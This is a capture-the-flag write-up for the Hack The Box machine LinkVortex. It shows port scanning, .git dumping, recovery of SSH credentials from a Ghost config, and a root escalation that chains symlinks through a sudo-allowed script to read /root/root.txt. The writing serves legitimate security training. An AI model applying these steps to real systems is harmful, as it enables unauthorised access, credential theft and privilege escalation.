# Hack the Box: LinkVortex Writeup

The LinkVortex is the machine from hack the box lab created by [0xyassine](https://app.hackthebox.com/users/143843). In this walkthrough, I will demonstrate how I obtained complete ownership of this machine.

[![](https://cdn.hashnode.com/res/hashnode/image/upload/v1737267474065/043ee712-b214-4180-9689-e1be2ee52cdb.png align="center")](https://www.hackthebox.com/machines/LinkVortex)

[https://www.hackthebox.com/machines/LinkVortex](https://www.hackthebox.com/machines/LinkVortex)

I have **owned** link vortex from hack the box

https://www.hackthebox.com/achievement/machine/615731/638

# Nmap Scanning

```bash
$ nmap -vvv -p- -T4 -oA nmap/initial 10.10.11.47

# Nmap 7.94SVN scan initiated Fri Dec 13 14:49:12 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p- -T4 -oA nmap/initial 10.10.11.47
Increasing send delay for 10.10.11.47 from 0 to 5 due to 629 out of 1571 dropped probes since last increase.
Increasing send delay for 10.10.11.47 from 5 to 10 due to 75 out of 186 dropped probes since last increase.
Warning: 10.10.11.47 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.47
Host is up, received reset ttl 63 (0.65s latency).
Scanned at 2024-12-13 14:49:13 +0545 for 2713s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
# Nmap done at Fri Dec 13 15:34:26 2024 -- 1 IP address (1 host up) scanned in 2715.23 seconds
```

Here, we can see that port 22 and 80 are open as ssh and http. Now port scanning is done using map which results in

```bash
$ nmap -vvv -p22,80 -sC -sV -oA nmap/ports 10.10.11.47

# Nmap 7.94SVN scan initiated Fri Dec 13 16:51:54 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p22,80 -sC -sV -oA nmap/ports 10.10.11.47
Nmap scan report for linkvortex.htb (10.10.11.47)
Host is up, received echo-reply ttl 63 (0.55s latency).
Scanned at 2024-12-13 16:51:54 +0545 for 36s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA=
|   256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz
80/tcp open  http    syn-ack ttl 63 Apache httpd
| http-methods:
|_  Supported Methods: POST GET HEAD OPTIONS
|_http-server-header: Apache
|_http-favicon: Unknown favicon MD5: A9C6DBDCDC3AE568F4E0DAD92149A0E3
|_http-generator: Ghost 5.58
| http-robots.txt: 4 disallowed entries
|_/ghost/ /p/ /email/ /r/
|_http-title: BitByBit Hardware
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 13 16:52:30 2024 -- 1 IP address (1 host up) scanned in 36.66 seconds
```

As there is web service running we will curl to get some initial information about the ip

```bash
$ curl -v 10.10.11.47
```

This will show some html text and where we can see it is moved permanently to `linkvortex.htb` so now we modify our hosts so that the url will run in our machine

```bash
$ sudo nano /etc/hosts
```

Add the ip and its corresponding url in the text editor

```plaintext
#.....
..
10.10.11.47    linkvortex.htb
.......
.......
```

Now when we run `linkvortex.htb` in browser then it will run with no errors

# Enumeration

```bash
$ gobuster dir -u linkvortex.htb -w /usr/share/wordlists/drib/common.txt
or
$ dirsearch -r http://linkvortex.htb
```

```bash
$ gobuster dns -d linkvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top0million-5000.txt
```

# git dumper

```bash
$ git-dumper http//:10.10.11.47/ ./linkvortex_dumped
```

**Find**

```bash
$ find * | grep -iR password
```

by guessing we get admin@linkvortex.htb as email

using wappalyzer we get ghost 5.58 running which CVE is searched

# Get user flag

we find GitHub repo on search written by the creator of this machine

[https://github.com/0xyassine/CVE-2023-40028](https://github.com/0xyassine/CVE-2023-40028)

from the docker file we use the provided cp information of `/var/lib/ghost/config.production.json` that provide us with the user and password for `ssh`

```bash
username:bob@linkvortex.htb
password:fibber-talented-worth
```

using the user and password we login to the system using ssh

```bash
$ ssh bob@linkvortex.htb
```

Where we cat out our user.txt flag.

# Get root flag

use the command `sudo -l` to check what are allowed to execute and found

```bash
bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty,
    env_keep+=CHECK_CONTENT
 
User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
```

`/usr/bin/bash /opt/ghost/clean_`[`symlink.sh`](http://symlink.sh) this does not require password to execute so

```bash
bob@linkvortex:~$ cat /opt/ghost/clean_symlink.sh 
#!/bin/bash
 
QUAR_DIR="/var/quarantined"
 
if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi
 
LINK=$1
 
if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi
 
if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi
```

we can check\_content=true while executing the sudo command

```bash
$ ln -s /root/root.txt flag.txt
$ ln -s /home/bob/flag.txt flag.png
$ sudo CHECK_CONTENT=True /usr/bin/bash /opt/ghost/clean_symlink.sh flag.png
```

This will provide root flag.
